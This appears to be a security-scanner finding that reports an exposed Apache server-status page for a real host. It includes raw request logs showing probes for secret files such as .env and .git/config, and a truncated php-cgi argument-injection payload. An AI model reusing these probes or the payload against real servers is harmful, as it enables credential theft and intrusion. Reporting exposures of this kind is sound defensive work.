2-119506040/1/14231_ 0.00007449650.00.00992.50 188.166.247.165http/1.1relehse.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-119506040/2/14203R 0.01207556490.00.00971.01 194.233.164.30http/1.1 2-119506040/0/14289R 0.0042577459290.00.00987.10 194.233.164.30http/1.1 2-119506040/1/14148_ 0.021196715290.00.011075.84 192.46.213.148http/1.1relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-119506040/1/14215_ 0.00106684420.00.00914.73 195.74.76.198http/1.1 2-119506040/2/14216R 0.00207085320.00.001061.49 194.233.164.30http/1.1 2-119506040/1/14310_ 0.02186743290.00.081055.92 192.46.213.148http/1.1relehse.com:443GET /info.php HTTP/1.1 2-119506040/3/14305R 0.01207029740.00.00969.83 194.233.164.30http/1.1 2-119506040/2/14217_ 0.020417008370.00.021011.69 192.46.213.148http/1.1relehse.com:443GET /server-status HTTP/1.1 2-119506040/1/14246_ 0.020366899430.00.01929.06 192.46.213.148http/1.1relehse.com:443GET /.git/config HTTP/1.1 3-119507340/2/8412_ 0.020393092650.00.01363.80 188.166.29.79http/1.1relehse.com:443GET /.DS_Store HTTP/1.1 3-119507340/3/8317_ 0.050333177230.00.01407.02 192.46.213.148http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 3-119507340/3/8350_ 0.051203688100.00.01412.35 192.46.213.148http/1.1relehse.com:443GET /.env HTTP/1.1 3-119507340/1/8404_ 0.00003222940.00.00362.39 195.74.76.198http/1.1 3-119507340/3/8413_ 0.04003363570.00.01415.29 195.74.76.198http/1.1 3-119507340/2/8352R 0.04103368220.00.09381.64 194.233.164.30http/1.1 3-119507340/4/8372_ 0.04003331930.00.03337.41 195.74.76.198http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHEAD / HTTP/1.1 3-119507340/2/8372R 0.051172690630.00.02340.79 194.233.164.30http/1.1 3-119507340/3/8406_ 0.06003191890.00.02409.21 194.233.164.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-119507340/3/8433R 0.051222983210.00.02445.71 194.233.164.30http/1.1 4-119506030/3/16316_ 0.01007329400.00.011101.12 194.233.164.30http/1.1 4-119506030/3/16402_ 0.01007573960.00.001114.17 194.233.164.30http/1.1 4-119506030/2/16378_ 0.01207426950.00.001093.84 207.154.241.99http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-119506030/4/16499_ 0.01007015410.00.021079.87 194.233.164.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-119506030/0/16316_ 0.0001127500930.00.001066.47 5.101.157.188http/1.1tandemsl.com:443GET /wp-login.php HTTP/1.1 4-119506030/1/16296_ 0.01007236800.00.001148.18 207.154.241.99http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-119506030/2/16403_ 0.00007316870.00.001064.58 188.166.247.165http/1.1relehse.com:80GET /.env HTTP/1.1 4-119506030/5/16402_ 0.01007592050.00.001137.94 207.154.241.99http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-119506030/2/16506_ 0.010137311220.00.011172.85 192.46.213.148http/1.1relehse.com:443GET /login.action HTTP/1.1 4-119506030/1/16377_ 0.00107182990.00.001058.72 195.74.76.198http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPU
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858022c9ca277
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 08-Jan-2026 16:24:13 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 121 Parent Server MPM Generation: 120 Server uptime: 7 days 17 hours 54 minutes 43 seconds Server load: 0.00 0.04 0.06 Total accesses: 135250 - Total Traffic: 4.1 GB - Total Duration: 99102155 CPU Usage: u39.24 s39.58 cu921.3 cs718.25 - .257% CPU load .202 requests/sec - 6.4 kB/second - 31.6 kB/request - 732.733 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01929323no1yes19000 11929456no1yes010000 21929326no0yes010000 31929324no3yes19001 41929325no0yes010000 Sum505 248001 ______W__________________________R________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-12019293230/48/2550_ 5.553014478450.013.0881.41 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-12019293230/65/2518_ 5.545011635050.06.5579.25 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-12019293230/48/2551_ 5.550015478570.02.7267.41 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-12019293230/53/2531_ 5.571012990080.01.2180.10 162.158.122.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-12019293230/57/2543_ 5.530023637110.02.7090.31 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 0-12019293230/46/2447_ 5.57129612483970.01.3364.36 162.158.122.178h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-12019293230/49/2477W 5.460014689400.05.6465.68 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-12019293230/44/2485_ 5.541028566420.01.1270.04 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-12019293230/54/2488_ 5.571140869900.01.7056.62 162.158.122.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-12019293230/46/2449_ 5.551013215210.01.3380.45 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-12019294560/86/2278_ 7.3322013833020.04.1966.09 162.158.122.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/83/2323_ 7.354020403140.02.9588.39 172.68.245.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/85/2234_ 7.360016665010.015.35122.61 162.158.122.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/80/2337_ 6.472393531309690.03.2373.58 188.114.111.208h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/81/2259_ 7.351014894510.03.1760.05 162.158.122.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/100/2238_ 7.332209084880.04.0750.17 162.158.122.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/94/2289_ 7.214031994170.03.2073.67 162.158.159.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/76/2289_ 7.2123022775410.04.1981.19 162.158.63.137h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/94/2238_ 7.36019548920.04.4195.58 162.158.122.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12019294560/87/2221_ 6.931013012290.02.9776.50 162.158.122.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/24/3042_ 4.491343218100.00.5262.54 162.158.120.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/19/3013_ 4.4823125571250.00.2474.19 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-12019293260/23/3019_ 4.489024111130.00.3999.74 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-12019293260/21/3088_ 4.485013902980.01.24120.20 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-12019293260/16/3041_ 4.23822829029970.01.1384.27 162.159.120.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/21/3129_ 4.34262127070320.01.1364.18 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/23/3014_ 4.46141522201010.00.9068.16 162.158.122.165h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-12019293260/14/3048_ 4.501020923250.00.9977.44 162.158.122.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/18/3030_ 3.93120720625240.00.69121.37 172.68.134.213h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12019293260/18/3097_ 4.382340515204920.08.6882.47 188.114.111.93h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 3-12019293240/47/2672_ 5.631128910600.01.4058.93 162.158.122.198h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/39/2686_ 5.59109489950.01.9487.82 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-12019293240/46/2625_ 5.641016137360.02.8084.96 104.22.23.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/44/2689R 5.61346811255340.01.9486.62 172.70.208.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/45/2669_ 5.640021942900.02.38104.12 162.158.122.76h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/50/2626_ 5.641018375420.01.9060.68 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-12019293240/48/2686_ 5.640024503450.02.7284.90 162.158.120.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/57/2667_ 5.601059207720.05.9684.78 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/46/2617_ 5.640016900270.03.7894.39 162.158.122.88h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12019293240/52/2673_ 5.6111732784760.01.9869.83 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12019293250/73/3083_ 7.7824243918871070.04.04109.68 104.22.24.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12019293250/76/2930_ 7.41239011957370.02.8067.07 172.68.134.35h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12019293250/88/3017_ 7.83161110160460.03.1296.79 104.23.190.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12019293250/65/3028_ 7.981010671320.02.4690.04 162.158.122.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12019293250/76/3011_ 7.981014577740.014.9890.45 162.158.120.243h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-120
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580220d21fce
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 01-Jan-2026 16:31:26 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 18 hours 1 minute 57 seconds Server load: 0.00 0.02 0.00 Total accesses: 9045 - Total Traffic: 310.7 MB - Total Duration: 7481204 CPU Usage: u22.17 s19.93 cu51.37 cs43.83 - .212% CPU load .139 requests/sec - 5018 B/second - 35.2 kB/request - 827.109 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01808802no0yes010000 11808803no0yes010000 21808804no0yes010000 31808805no0yes010000 41808936no0yes19000 Sum500 149000 ______________________________________________W___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-518088020/11/33_ 4.6430920127360.00.210.53 172.68.134.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-518088020/9/31_ 5.7211062890.00.521.31 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-518088020/8/31_ 4.79309717962170.00.110.75 172.70.135.59h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-518088020/13/37_ 4.882820184180.00.391.20 74.7.227.138http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-518088020/3/27_ 0.801829769980.00.121.01 172.70.211.185h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-518088020/7/31_ 4.6310069080.00.201.55 172.68.134.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-518088020/5/24_ 4.6330920159270.00.200.95 172.68.134.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-518088020/11/38_ 5.7119078170.00.241.13 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-518088020/6/25_ 4.632815071600.00.230.52 172.68.134.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-518088020/7/27_ 4.642815033820.00.091.03 172.68.135.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/15/187_ 4.4060936840.00.396.71 74.176.56.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-content/uploads/ HTTP/1.1 1-518088030/16/180_ 4.4035920882550.00.144.78 74.176.56.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/14/192_ 4.7035920904550.00.2226.70 104.22.7.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/22/196_ 4.7035920886460.01.365.69 172.68.135.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/18/184_ 4.6835920639060.00.275.31 172.68.134.143h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/16/195_ 4.4035920864760.00.302.56 74.176.56.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/21/189_ 4.7035920870430.00.3926.81 172.68.135.151h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-518088030/20/196_ 5.7090857280.00.366.54 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-518088030/17/187_ 4.7035920765220.01.094.17 104.22.7.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-518088030/17/206_ 5.7100777570.00.325.95 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-518088040/130/161_ 9.9631682980.01.892.82 162.158.42.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-518088040/134/156_ 10.2060743970.02.483.12 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-518088040/126/146_ 10.2070707970.02.393.05 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-518088040/131/159_ 9.867527544840.03.154.55 172.71.30.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-518088040/130/149_ 10.07191553500.01.872.27 104.23.211.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-518088040/142/165_ 10.2080839420.04.244.92 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-518088040/124/147_ 10.18210573820.01.822.50 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-518088040/134/157_ 10.18200793660.02.523.40 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-518088040/136/152_ 9.9721260748170.02.122.33 172.70.126.13h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-518088040/146/165_ 10.1840723770.05.896.32 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-518088050/10/152_ 4.6533430435230.00.122.30 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //test/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/11/151_ 4.6533430707900.00.383.64 34.172.14.93http/1.1 3-518088050/8/139_ 4.6533430730610.00.033.12 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //sito/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/13/153_ 5.71100528920.00.1411.24 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-518088050/10/151_ 4.65334301180100.00.048.57 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/10/134_ 4.6590708720.00.123.51 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //shop/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/7/150_ 4.6533430658460.00.093.19 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/8/148_ 4.653343037840990.00.0311.71 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //media/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/10/152_ 4.6533430507600.00.183.26 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //site/wp-includes/wlwmanifest.xml HTTP/1.1 3-518088050/8/149_ 4.6533430688230.00.183.46 34.172.14.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET //cms/wp-includes/wlwmanifest.xml HTTP/1.1 4-518089360/160/398_ 10.47201329160.02.679.56 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 4-518089360/160/370_ 10.49201274930.03.148.75 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-518089360/134/351_ 10.211111520440.02.2124.44 104.23.209.199h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-518089360/173/387_ 10.491201984330.02.816.37 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-518089360/166/380_ 10.49301503510.04.067.27 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-518089360/155/373_ 10.43121491260330.03.598.00 172.71.150.177h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802802a5771
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 29-Dec-2025 22:07:44 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 79 Parent Server MPM Generation: 78 Server uptime: 16 days 15 hours 3 minutes 38 seconds Server load: 0.16 0.10 0.09 Total accesses: 433024 - Total Traffic: 13.6 GB - Total Duration: 419899402 CPU Usage: u146.89 s112.64 cu2405.54 cs1557.09 - .294% CPU load .301 requests/sec - 9.9 kB/second - 32.8 kB/request - 969.691 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01650370no0yes010000 11650366no0yes010000 21650332no0yes010000 31650331no3yes010021 41650465no1yes19000 Sum504 149021 __________________________________________W_______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7816503700/441/9802_ 38.07863052218810.014.39327.25 172.68.7.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/439/10311_ 37.05862058915800.011.05308.64 141.101.97.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/476/9894_ 38.44691089001890.016.87301.02 172.68.234.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/478/10072_ 38.43686060508980.016.49288.11 162.158.22.232h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/491/9833_ 37.05863051985300.015.71236.79 141.101.69.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/478/10072_ 38.44862191004660.011.76286.78 172.68.234.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/520/9934_ 37.04863065238750.018.19390.55 172.71.126.195h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/478/10236_ 37.05863053748700.016.66269.13 141.101.95.113h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/447/9811_ 38.50691099102330.018.13413.46 162.158.122.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-7816503700/468/10033_ 36.33686258612050.013.08309.49 103.23.60.244h27f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/435/7821_ 34.4610339325000.022.97292.98 162.159.122.117h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/446/7854_ 33.6886324846614350.013.79204.48 172.70.208.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/407/7735_ 34.53690057587480.043.22289.99 162.158.122.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/408/7619_ 34.03685041277010.08.95159.33 162.159.122.155h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/420/7908_ 34.7607448465430.013.67227.31 104.244.75.4http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 1-7816503660/448/7734_ 34.7411055733620.012.66243.95 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-7816503660/435/7687_ 34.466850166132660.013.31203.58 172.70.108.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/401/7763_ 34.7516850493250.011.78216.85 104.244.75.4http/1.1barrerasdecontencion.com:443GET /wp-login.php HTTP/1.1 1-7816503660/426/7659_ 34.47862082551760.040.22286.73 172.70.108.61h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7816503660/434/7903_ 33.03862051002870.013.59173.70 172.71.118.160h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/489/7927_ 37.5786228244229300.09.99326.50 172.70.94.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/532/7940_ 36.198631863741970.026.48298.68 172.68.151.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/497/8000_ 37.65862048024950.011.60250.11 172.68.234.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/500/7978_ 36.97863096634570.011.50221.78 162.158.120.194h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/541/8034_ 37.67862050361270.08.69302.06 162.158.23.117h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/472/8039_ 37.67863041102150.010.37285.19 172.68.234.22h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/524/8017_ 37.66863059370530.021.24320.40 172.68.234.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/493/8010_ 33.52863247559480.027.48260.15 162.159.113.17h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/481/7817_ 37.66863246399170.08.71306.59 162.159.122.68h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7816503320/540/8152_ 37.67862053689410.027.77280.87 162.159.122.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7816503310/116/9041_ 21.326056157750.02.89276.06 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-7816503310/107/8893_ 21.342070579910.02.33284.52 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-7816503310/108/8740_ 21.32341137199540.023.99335.22 162.158.120.205h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7816503310/108/8922_ 21.34237560614030.01.29272.69 104.23.221.80h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7816503310/129/9175_ 21.313059110040.01.54303.69 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-7816503310/92/8717_ 21.322057237210.02.31268.83 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-7816503310/101/8935_ 21.20144184331410.02.32256.83 8.217.37.178http/1.1 3-7816503310/113/9120_ 21.341069160980.04.84402.08 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-7816503310/110/9026_ 21.312061614190.01.22310.08 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-7816503310/111/8935_ 21.2766753253200.01.82273.55 8.217.37.178http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 4-7816504650/733/8629_ 43.9330179019160.032.37310.19 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-7816504650/593/8333_ 43.75764966341630.014.80216.94 104.22.20.227h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7816504650/619/8570W 43.920083335360.018.85283.79 167.99.181.249http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-7816504650/674/8695_ 43.82441663782890.016.95287.36 8.217.37.178http/1.1 4-7816504650/655/8553_ 43.80170251448890.048.74279.20 172.71.124.213h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-7816504650/647/8508<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858025d9b4f55
